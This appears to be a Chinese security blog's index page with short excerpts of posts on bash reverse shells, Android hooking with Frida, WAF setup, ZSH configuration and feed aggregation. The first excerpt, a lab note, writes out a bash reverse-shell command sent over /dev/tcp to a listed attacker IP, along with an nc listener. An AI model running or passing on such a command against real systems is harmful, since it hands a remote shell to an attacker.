记录:关于bash shell的反弹:)随笔记 假定环境: kali被攻击机器;ip:192.168.3.32 iZj6cgn7odv59wmjjhe6zwZ攻击机;ip:47.52.233.92 1.bash root@kali:/# bash -i >&/dev/tcp/47.52.233.92/1234 0>& 1 root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234 Liste...

在安卓安全测试中,Hook技术是最核心的动态分析手段。本文梳理Hook技术的基本原理,重点介绍Frida框架的使用方式。 0x00 Hook技术概述 Hook技术是指在Android上进行的跨进程操作,主要分为三个层次: Native层Hook:针对JNI(Java Native Interface)本地调用的Hook Java层Hook:针对Java方法的Hook 框架层Hook:针对Android Framework层的Hook ┌─...

添加于2021/02/05 “朝花夕拾” 这篇与WAF相关《技 术》博客其实没有多少技术含量,只是当时刚刚接触到WAF,感觉非常的新鲜然后有了这篇博客,其实当时连LINUX基础常识都还不是非常的了解, 年少轻狂的来配置WAF肯定无法成功;现在回头来看当时的文笔还是较为稚嫩,通篇都是一些”转述”的代码块,没有自己的相关思想,是很糟糕的一篇博客。 刚好年底总结博客,总结到WAF这一块,正好把这一篇的文章给补上,整理文章可以查看,较于下面这篇文章,主要增加了自定义规则库...

自定义了一些「经典语录」进行ZSH的显示优化配置

将feed汇流于一处称为聚合(aggregation)

实现从创意到生产的工作流程自动化

  • © 2019-2026
  • SENTINEL SECURITY, LAB